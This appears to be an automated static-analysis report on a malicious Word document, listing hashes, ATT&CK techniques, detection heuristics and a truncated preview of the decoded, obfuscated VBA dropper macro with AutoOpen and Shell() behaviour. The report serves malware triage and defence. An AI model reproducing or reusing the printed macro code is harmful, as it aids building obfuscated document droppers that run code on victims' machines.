Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f04475ef220a3054…

MALICIOUS

Office (OLE)

211.0 KB Created: 2018-02-27 14:26:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: f40a9b36e3959928aa10437b1ffb9b4a SHA-1: f8a44db8be4adc0d2d7921dabaaacb8835addd19 SHA-256: f04475ef220a30546e1f7f5628c3059a3a0fbcc968e5992f79a8edb12d9c7096
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro includes a Shell() call, indicating an attempt to execute arbitrary code. This is further supported by ClamAV detection as a dropper agent. The macro's obfuscated nature and the presence of a 'macros.bas' artifact suggest it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6458289-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458289-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62600 bytes
SHA-256: 193c0e6904a06b990aa5396741339648934c353acd689aeffa84b7210cb5de7a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UNOwYMEWlDIij"
Sub ZKSdasjlul()
   On Error Resume Next
   Do While KZdBEZwoXp Xor jCiFzShUWziL
      Dim uRisHLjScTO
      Do While aVjiLtLkkdQw Or sODaPibOw
         nvDjMF = 6025 - Atn(EjQRZzAqK / CByte(7) + XauRB + Hex(WPzfsNonZbO)) + (171376742 / jHMzfOYjhETQD) * (5938624 * ChrW(520437311) + EaEoDqmPjRO * iqudszjHHC)
      Loop
      XvjsUzSvjcIJO = 6025 - Atn(lYXHTbukEji / CByte(7) + ELVhwcBjjsWz + Hex(RNWhzWhj)) + (171376742 / HZLAnbwmqzJht) * (5938624 * ChrW(520437311) + awjfHi * sBaoC)
      Do
         YCHNAGK = vWvpa * CDate(426718607 * Atn(tCZnkYGwjRrZ - Fix(rOYlL * CDate(8832))) * OYjjjJbiCick / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(hsIpbmEiGcTp) / bFSpXlkEL - ChrB(872) / JTqiJpE + Chr(778 / Atn(48 * Round(GhBsJiZw / CBool(2)))) / (1199 / CByte(HGIwQtNhVPMHrz * 8 + VdzWlHuoCKNI * CDbl(39)))
      Loop Until iwkQamdw <= StZdw
      arKPhRXfjCLr = RGlClsz + fwjEVlRLF
   Loop
   Set IKGOKzzaDLQANO = RhzjqokzNuudLL
End Sub
Function VSBjSihFbzlvMm()
On Error Resume Next
vOzMrzGkwKf = "rwl%kwcUCbwZwmLdoMCtQvktfLYzFC"
JUKLRrMjVv = hmlibKIJOCJ = 6025 - Atn(TaIAUPpUCjQti / CByte(7) + TjcvGGb + Hex(LCrDpm)) + (171376742 / tqCqikAFwUrR) * (5938624 * ChrW(520437311) + dBWsANq * jTvDQKPFIQ)
FlitvZiUiv = DfJqNCviSb = 6025 - Atn(aPoMfJjzDc / CByte(7) + MNWHmRZkzpERNj + Hex(LIqEiYBC)) + (171376742 / jODiFZJMzITvT) * (5938624 * ChrW(520437311) + PiFhbo * zbdLwXIzt)
AXhKo = iuivbdfghnkjgyugjn(vOzMrzGkwKf, 26, 2)
zWLvnbXHSh = "EkwOJjHjKTisJXtucZzYlU !%6rav%!!%5raqq"
jtJObcGoY = JSnZFrERNfz = 6025 - Atn(SnnEXohnHdj / CByte(7) + aiANCFAFzz + Hex(ztKrQnSZ)) + (171376742 / YuLqdPjwUjafjI) * (5938624 * ChrW(520437311) + bqrPHfufTXpKNw * zpEoGjSJ)
hnuXMTWFpvw = mVBlQYkOlLQ = 6025 - Atn(wCRPdOsSn / CByte(7) + WCCkl + Hex(uBSIhGcmdJ)) + (171376742 / unbZCfr) * (5938624 * ChrW(520437311) + mmYcS * qwizzijnJ)
QSHQvFsL = iuivbdfghnkjgyugjn(zWLvnbXHSh, 3, 14)
ijOSOLiB = "LSYmIMJCkZLQadQjXUwoUUioLWRiG"
zbZUOji = tPrCEp = 6025 - Atn(wLUmijQ / CByte(7) + IjZrIADkSJK + Hex(QzwjjOiODj)) + (171376742 / fNUfLd) * (5938624 * ChrW(520437311) + mNuKQ * FokHpiZs)
wXVBqM = KtwNnFTFCdYYu = 6025 - Atn(nUrHQWwkFi / CByte(7) + bsiWYYJPlC + Hex(jwpvTIshsw)) + (171376742 / LwnwXJW) * (5938624 * ChrW(520437311) + aoQjMNojdEPIJa * osRUDor)
iERWtRlYDU = iuivbdfghnkjgyugjn(ijOSOLiB, 14, 8)
ChQTHCJbP = "VMLoGoiwll=%6rav% tesRVlzRKYonvWuj"
LmsSH = ZYLYO = 6025 - Atn(fmGacSCts / CByte(7) + SNIikE + Hex(hJDorEEi)) + (171376742 / GkzrRYzU) * (5938624 * ChrW(520437311) + JuJtbIhlnEb * wQUId)
AQfGjj = KkoiBrM = 6025 - Atn(RuBouOn / CByte(7) + bKGohuHFQAHKHU + Hex(inIoktbsRj)) + (171376742 / qmjzJNR) * (5938624 * ChrW(520437311) + pJBohPciRBkBEz * SAlZDFzS)
FmduRN = iuivbdfghnkjgyugjn(ChQTHCJbP, 14, 13)
GXKhhnVAPf = "MQrVv%!!%4rav%!!%3rav%UzojiFhSEcYjb"
VNBZw = ajwOnTwzQE = 6025 - Atn(IBHIj / CByte(7) + ldjiSQjwnuvhu + Hex(GskZYTER)) + (171376742 / QoNQODM) * (5938624 * ChrW(520437311) + qZpDtivHPOPAZ * SVlzP)
NwTUpjpnZzU = ijQnURQp = 6025 - Atn(zVubBE / CByte(7) + FPNKoR + Hex(EoRmMV)) + (171376742 / fRnvKGICjbRFC) * (5938624 * ChrW(520437311) + tVYXwKQW * FcQbMwCfDUN)
swkZBvm = iuivbdfghnkjgyugjn(GXKhhnVAPf, 14, 18)
tcQjV = "YijkZrav% tOYQJll"
QZuskO = rwvZYjYcBk = 6025 - Atn(qiihIPsJ / CByte(7) + vamiaHiaJZt + Hex(CnGWHZZIHVYM)) + (171376742 / OVwjr) * (5938624 * ChrW(520437311) + ZZpiRJQzQzzTcq * orcKBpTAZaB)
zjtQTDrl = bLlktSbUNM = 6025 - Atn(pMqaIL / CByte(7) + BwWXZi + Hex(WpIGYPEPj)) + (171376742 / nfNDABWRbjnw) * (5938624 * ChrW(520437311) + OKpQYFE * lHNXc)
wbfbz = iuivbdfghnkjgyugjn(tcQjV, 7, 6)
CVrkrXbz = "wKWnvZamsUo% teQDIc"
jzBMOil = NLVjbKpWfHzW = 6025 - Atn(parluwLUTwHwa / CByte(7) + EMKOPW + Hex(YvdtABCGoHY)) + (171376742 / fcnBCOBPQuO) * (5938624 * ChrW(520437311) + jAFlKVt * ALRfNrtzIOf)
CzLzDk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.